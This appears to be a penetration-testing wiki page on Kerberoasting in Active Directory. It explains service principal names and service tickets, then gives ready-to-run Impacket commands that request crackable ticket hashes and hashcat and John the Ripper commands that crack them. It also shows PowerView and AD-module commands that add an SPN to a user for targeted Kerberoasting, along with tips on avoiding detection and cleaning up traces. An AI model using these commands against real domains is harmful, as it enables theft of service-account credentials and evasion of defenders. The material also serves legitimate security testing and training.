Kerberoasting
OPSEC: Kerberoasting is a very silent attack; only one logged entry is created when requesting the ST (4769
). There are typically thousands of those events on a DC per day.
Kerberoasting is an attack on the Service Ticket (ST) and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql
, in whose, often privileged, context the service is running. The ST is encrypted with the service's account NTLM hash, so it can potentially be cracked. Any domain user can request a ST from the DC for any SPN account.
Accounts like krbtgt
, machine accounts (e.g. dc01$
), and (g)MSAs are usually resistant due to complex, long passwords.

Tools
Find and attack user accounts used as service accounts with Impacket:
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain>/<user> -outputfile <fileName>
# Kerberoast an account susceptible to ASREPRoasting
sudo impacket-GetUserSPNs -no-preauth jjones -usersfile domain_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt
If time sync errors occur, i.e., KRB_AP_ERR_SKEW(Clock skew too great)
:
sudo ntpdate <dc-ip>
The krb5tgs
hashes can be cracked offline using Hashcat or JtR:
# Crack the hashes using Hashcat
sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Crack the hashes using John the Ripper
.\john.exe --wordlist=<wordlist> hashes.kerberoast
Targeted Kerberoast
If we have GenericWrite
or GenericAll
on a user object, we can set an SPN on that user account and then extract and crack the TGS.
OPSEC: Clean up by removing the SPN afterwards.
Set a SPN for the target user (must be unique for the forest) using PowerView or the ActiveDirectory module:
# PowerView
Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='<serviceName>/<randomString>'}
# AD module
Set-ADUser -Identity <targetUser> -ServicePrincipalNames @{Add='<serviceName>/<randomString>'}
Resources
Last updated
Was this helpful?